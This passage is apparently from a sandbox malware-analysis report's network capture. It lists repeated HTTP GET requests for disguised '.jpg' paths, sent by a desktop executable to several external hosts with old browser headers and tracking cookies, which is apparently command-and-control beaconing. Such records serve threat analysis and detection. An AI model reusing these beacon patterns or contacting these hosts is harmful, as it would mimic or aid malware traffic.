                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:34.184065104 CEST | 303 | OUT | GET /xs.jpg?9ffb83c1=-1075505530 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159350|1720159259|3|24|0
                                  Jul 5, 2024 08:02:34.711122990 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:34 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  125 | 192.168.2.9 | 49838 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:34.792355061 CEST | 306 | OUT | GET /images/xs.jpg?a5ab2386=-2018641750 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159351|1720159260|4|24|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:35.304856062 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:35 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  126 | 192.168.2.9 | 49839 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:35.314815998 CEST | 193 | OUT | GET /xs.jpg?a9db6871=-1485987388 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:35.970390081 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:35 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  127 | 192.168.2.9 | 49840 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:36.104938984 CEST | 204 | OUT | GET /images/xs2.jpg?adce999d=316119470 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:36.887661934 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:36 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:36.892874956 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:37.115854979 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:37 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:37 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  128 | 192.168.2.9 | 49841 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:37.295682907 CEST | 312 | OUT | GET /images/xs.jpg?bbd2b314=-1424130204 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159354|1720159259|4|25|0
                                  Jul 5, 2024 08:02:38.040688038 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:37 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  129 | 192.168.2.9 | 49842 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:38.250499964 CEST | 301 | OUT | GET /xs.jpg?c1df27dd=251215592 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159354|1720159259|3|25|0
                                  Jul 5, 2024 08:02:38.732191086 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:38 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  130 | 192.168.2.9 | 49843 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:38.741816044 CEST | 304 | OUT | GET /images/xs.jpg?c3baede6=500657968 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159355|1720159260|4|25|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:39.235857964 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:39 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  131 | 192.168.2.9 | 49844 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:39.258809090 CEST | 193 | OUT | GET /xs.jpg?c750acd5=-1902028374 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:39.916631937 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:39 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  132 | 192.168.2.9 | 49845 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:39.967799902 CEST | 205 | OUT | GET /images/xs2.jpg?cbebb896=1673734594 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:40.704282045 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:40 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>
                                  Jul 5, 2024 08:02:40.710587978 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:40.935942888 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:40 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:40 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  133 | 192.168.2.9 | 49846 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:41.070662975 CEST | 312 | OUT | GET /images/xs.jpg?d597c30b=-2134423263 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159357|1720159259|3|26|0
                                  Jul 5, 2024 08:02:41.803441048 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:41 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  134 | 192.168.2.9 | 49847 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:41.811933041 CEST | 301 | OUT | GET /xs.jpg?defe4bdb=972408610 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159358|1720159259|3|26|0
                                  Jul 5, 2024 08:02:42.552499056 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:42 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  135 | 192.168.2.9 | 49848 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:42.573580027 CEST | 304 | OUT | GET /images/xs.jpg?e806d3ea=675115834 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159359|1720159260|4|26|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:43.083165884 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:43 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  136 | 192.168.2.9 | 49849 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:43.122011900 CEST | 192 | OUT | GET /xs.jpg?ed0b353e=-954097734 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:43.791151047 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:43 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  137 | 192.168.2.9 | 49850 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:43.840428114 CEST | 206 | OUT | GET /images/xs2.jpg?f50273b1=-1659498183 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:44.564938068 CEST | 933 | IN | HTTP/1.1 301 Moved Permanently
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  content-type: text/html
                                  content-length: 707
                                  date: Fri, 05 Jul 2024 06:02:44 GMT
                                  location: http://ampyazilim.com.tr/images/xs2.jpg?1
                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">301</h1><h2 style="margin-top:20px;font-size: 30px;">Moved Permanently</h2><p>The document has been permanently moved.</p></div></div></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  138 | 192.168.2.9 | 49851 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:44.819983006 CEST | 211 | OUT | GET /images/xs2.jpg?1 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ampyazilim.com.tr
                                  Cache-Control: no-cache
                                  Connection: Keep-Alive
                                  Jul 5, 2024 08:02:45.542001009 CEST | 646 | IN | HTTP/1.1 200 OK
                                  Connection: Keep-Alive
                                  Keep-Alive: timeout=5, max=100
                                  cache-control: max-age=84600, public
                                  expires: Fri, 12 Jul 2024 06:02:45 GMT
                                  content-type: image/jpeg
                                  last-modified: Thu, 02 Dec 2021 06:14:43 GMT
                                  accept-ranges: bytes
                                  content-length: 340
                                  date: Fri, 05 Jul 2024 06:02:45 GMT


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  139 | 192.168.2.9 | 49852 | 54.244.188.177 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:45.687757015 CEST | 309 | OUT | GET /images/xs.jpg?4745dc7=523145329 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: www.careerdesk.org
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159361|1720159259|3|27|0
                                  Jul 5, 2024 08:02:46.418057919 CEST | 595 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:46 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=www.careerdesk.org; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=6c1ddd121571cd6cbce60b3d072cca39|8.46.123.33|1720159366|1720159259|4|28|0; path=/; domain=.careerdesk.org; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  140 | 192.168.2.9 | 49853 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:46.468982935 CEST | 301 | OUT | GET /xs.jpg?c7a449b=1256037282 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: arthur.niria.biz
                                  Cache-Control: no-cache
                                  Cookie: snkz=8.46.123.33; btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159362|1720159259|3|27|0
                                  Jul 5, 2024 08:02:46.957115889 CEST | 586 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:46 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=; path=/; domain=.arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=; path=/; domain=arthur.niria.biz; Max-Age=1; Expires=Thu, 01 Jan 1970 00:00:01 GMT; HttpOnly; SameSite=Lax;
                                  Set-Cookie: btst=eb3d1a0aaa6809b3363ec2c38ffb304a|8.46.123.33|1720159366|1720159259|3|28|0; path=/; domain=.niria.biz; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  141 | 192.168.2.9 | 49854 | 44.221.84.105 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:47.224287987 CEST | 304 | OUT | GET /images/xs.jpg?10878fe9=831958971 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: apple-pie.in
                                  Cache-Control: no-cache
                                  Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159363|1720159260|4|27|0; snkz=8.46.123.33
                                  Jul 5, 2024 08:02:47.722543001 CEST | 334 | IN | HTTP/1.1 200 OK
                                  Server: nginx
                                  Date: Fri, 05 Jul 2024 06:02:47 GMT
                                  Content-Type: text/html
                                  Transfer-Encoding: chunked
                                  Connection: close
                                  Set-Cookie: btst=7dcb216f8ba22ca1321ea8782c10c8ea|8.46.123.33|1720159367|1720159260|4|28|0; path=/; domain=.apple-pie.in; Expires=Thu, 15 Apr 2027 00:00:00 GMT; HttpOnly; SameSite=Lax;
                                  Data Raw: 30 0d 0a 0d 0a
                                  Data Ascii: 0


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  142 | 192.168.2.9 | 49855 | 78.46.2.155 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:47.730063915 CEST | 192 | OUT | GET /xs.jpg?17066025=-432029326 HTTP/1.1
                                  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)
                                  Host: ahmediye.net
                                  Cache-Control: no-cache
                                  Jul 5, 2024 08:02:48.456147909 CEST | 403 | IN | HTTP/1.1 404 Not Found
                                  Date: Fri, 05 Jul 2024 06:02:48 GMT
                                  Server: Apache
                                  Content-Length: 258
                                  Content-Type: text/html; charset=iso-8859-1
                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at ahmediye.net Port 80</address></body></html>


                                  Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                  143 | 192.168.2.9 | 49856 | 37.230.104.89 | 80 | 7248 | C:\Users\user\Desktop\#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.exe
                                  Timestamp | Bytes transferred | Direction | Data
                                  Jul 5, 2024 08:02:48.516870975 CEST | 205 | OUT | GET /images/xs2.jpg?1ebf202e=-684072638 HTTP/1.1
